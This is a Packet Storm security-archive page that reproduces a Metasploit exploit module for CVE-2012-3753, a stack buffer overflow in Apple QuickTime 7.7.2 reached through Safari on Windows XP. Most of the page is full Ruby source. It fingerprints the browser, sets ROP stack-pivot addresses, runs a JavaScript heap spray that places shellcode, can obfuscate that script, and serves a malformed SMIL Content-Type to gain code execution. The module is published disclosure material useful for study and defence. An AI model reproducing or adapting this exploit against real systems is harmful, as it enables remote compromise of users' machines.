all things security

Apple QuickTime 7.7.2 MIME Type Buffer Overflow

Apple QuickTime 7.7.2 MIME Type Buffer Overflow
Posted Nov 29, 2012
Authored by juan vazquez, Pavel Polischouk | Site metasploit.com

This Metasploit module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack based overflow occurs when processing a malformed Content-Type header. The module has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.

tags | exploit, overflow
systems | windows, apple, xp
advisories | CVE-2012-3753, OSVDB-87088
MD5 | 102127242852b83738de42d177aa8f59

Apple QuickTime 7.7.2 MIME Type Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::RopDb

include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::SAFARI,
:ua_maxver => '5.0.1',
:ua_maxver => '5.1.7',
:javascript => true,
:rank => NormalRanking, # reliable memory corruption
:vuln_test => nil
})

def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.7.2 MIME Type Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack
based overflow occurs when processing a malformed Content-Type header. The module
has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.
},
'Author' =>
[
'Pavel Polischouk', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-3753' ],
[ 'OSVDB', '87088'],
[ 'BID', '56438' ],
[ 'URL', 'http://support.apple.com/kb/HT5581' ],
[ 'URL', 'http://asintsov.blogspot.com.es/2012/11/heapspray.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'Targets' =>
[
# Tested with QuickTime 7.7.2
[ 'Automatic', {} ],
[ 'Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2',
{
'OffsetFirstStackPivot' => 389,
'OffsetSecondStackPivot' => 105,
'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,
'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts
'SprayOffset' => 264,
'SprayedAddress' => 0x60130124
}
],
[ 'Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2',
{
'OffsetFirstStackPivot' => 389,
'OffsetSecondStackPivot' => 105,
'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,
'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts
'SprayOffset' => 264,
'SprayedAddress' => 0x60130124
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Nov 07 2012',
'DefaultTarget' => 0))

register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class
)
end

def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'

nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''

browser_name = ""
if agent =~ /Safari/ and agent=~ /Version\/5\.1\.7/
browser_name = "Safari 5.1.7"
elsif agent =~ /Safari/ and agent=~ /Version\/5\.0\.5/
browser_name = "Safari 5.0.5"
end

os_name = 'Windows XP SP3'

targets.each do |t|
if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end

return nil
end

def on_request_uri(client, request)

agent = request.headers['User-Agent']
my_target = get_target(agent)

# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end

return if ((p = regenerate_payload(client)) == nil)

if request.uri =~ /\.smil$/
print_status("Sending exploit (target: #{my_target.name})")
smil = rand_text_alpha(20)
type = rand_text_alpha_lower(1)
subtype = rand_text_alpha_lower(my_target['OffsetSecondStackPivot'])
subtype << [my_target['SecondStackPivot']].pack("V")
subtype << [my_target['SprayedAddress']].pack("V")
subtype << rand_text_alpha_lower(my_target['OffsetFirstStackPivot'] - subtype.length)
subtype << rand_text_alpha_lower(4)
subtype << [my_target['FirstStackPivot']].pack("V")
subtype << rand_text_alpha_lower(10000 - subtype.length)
send_response(client, smil, { 'Content-Type' => "#{type}/#{subtype}" })
else
print_status("Sending initial HTML")
url = ((datastore['SSL']) ? "https://" : "http://")
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
url << ":" + datastore['SRVPORT'].to_s
url << get_resource
fname = rand_text_alphanumeric(4)

code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))
offset = rand_text(my_target['SprayOffset'])
js_offset = Rex::Text.to_unescape(offset, Rex::Arch.endian(my_target.arch))
fill = rand_text(4)
js_fill = Rex::Text.to_unescape(fill, Rex::Arch.endian(my_target.arch))

# Heap Spray based on http://asintsov.blogspot.com.es/2012/11/heapspray.html
js = <<-JSSPRAY
function heapSpray(offset, shellcode, fillsled) {
var chunk_size, headersize, fillsled_len, code;
var i, codewithnum;
chunk_size = 0x40000;
headersize = 0x10;
fillsled_len = chunk_size - (headersize + offset.length + shellcode.length);
while (fillsled.length <fillsled_len)
fillsled += fillsled;
fillsled = fillsled.substring(0, fillsled_len);
code = offset + shellcode + fillsled;
heap_chunks = new Array();
for (i = 0; i<1000; i++)
{
codewithnum = "HERE" + code;
heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
}
}
var myoffset = unescape("#{js_offset}");
var myshellcode = unescape("#{js_code}");
var myfillsled = unescape("#{js_fill}");
heapSpray(myoffset,myshellcode,myfillsled);
JSSPRAY

if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end

content = "<html>"
content << "<head><script>"
content << "#{js}"
content << "</script></head>"
content << "<body>"
content << <<-ENDEMBED
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
WIDTH="1"
HEIGHT="1"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
<PARAM name="SRC" VALUE = "#{url}/#{fname}.smil">
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.smil">
<PARAM name="AUTOPLAY" VALUE = "true" >
<PARAM name="TYPE" VALUE = "video/quicktime" >
<PARAM name="TARGET" VALUE = "myself" >
<EMBED
SRC = "#{url}/#{fname}.smil"
QTSRC = "#{url}/#{fname}.smil"
TARGET = "myself"
WIDTH = "1"
HEIGHT = "1"
AUTOPLAY = "true"
PLUGIN = "quicktimeplugin"
TYPE = "video/quicktime"
CACHE = "false"
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
</EMBED>
</OBJECT>
ENDEMBED
content << "</body></html>"
send_response(client, content, { 'Content-Type' => "text/html" })
end

# Handle the payload
handler(client)
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close